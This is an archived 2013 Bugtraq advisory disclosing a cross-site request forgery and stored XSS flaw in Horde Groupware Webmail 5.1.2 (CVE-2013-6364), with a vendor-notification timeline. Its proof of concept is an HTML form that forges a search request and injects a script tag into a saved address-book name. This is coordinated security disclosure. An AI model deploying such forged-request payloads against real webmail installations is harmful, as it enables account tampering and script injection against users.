lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Sun, 3 Nov 2013 21:33:02 GMT
From: m.benetrix@...ecure.com.au
To: bugtraq@...urityfocus.com
Subject: XSS and CSRF Horde Groupware Web mail Edition

#############################
Exploit Title : XSS and CSRF Horde Groupware Web mail Edition
Author:Marcela Benetrix
Date: 10/28/13
version: 5.1.2
software link:http://www.horde.org/apps/webmail

#############################
GroupWare Web mail Edition

Horde Groupware Webmail Edition is a free, enterprise ready, browser based communication suite. Users can read, send and organize email messages and manage and share calendars, contacts, tasks, notes, files, and bookmarks with the standards compliant components from the Horde Project

##########################
CSRF/XSS Location

Save search as a virtual Address book was found to be vulnerable to XSS and CSRF attacks. 

##########################
POC

<html>
  <body>
    <form action="http://www.victim.com/horde/turba/search.php"
method="POST">
      <input type="hidden" name="source" value="" />
      <input type="hidden" name="criteria" value="" />
      <input type="hidden" name="val" value="" />
      <input type="hidden" name="search" value="Search" />
      <input type="hidden" name="save&#95;vbook" value="on" />
      <input type="hidden" name="vbook&#95;name"
value="<script>alert(1)</script>" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


###########################
CVE identifier

CVE-2013-6364 for the combination of problems that is exploited through the CSRF attack.
##########################
Vendor Notification
10/28/2013 to: the developers. They replied immediately and fixed the problem http://bugs.horde.org/ticket/12803
11/04/2013: Disclosure

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ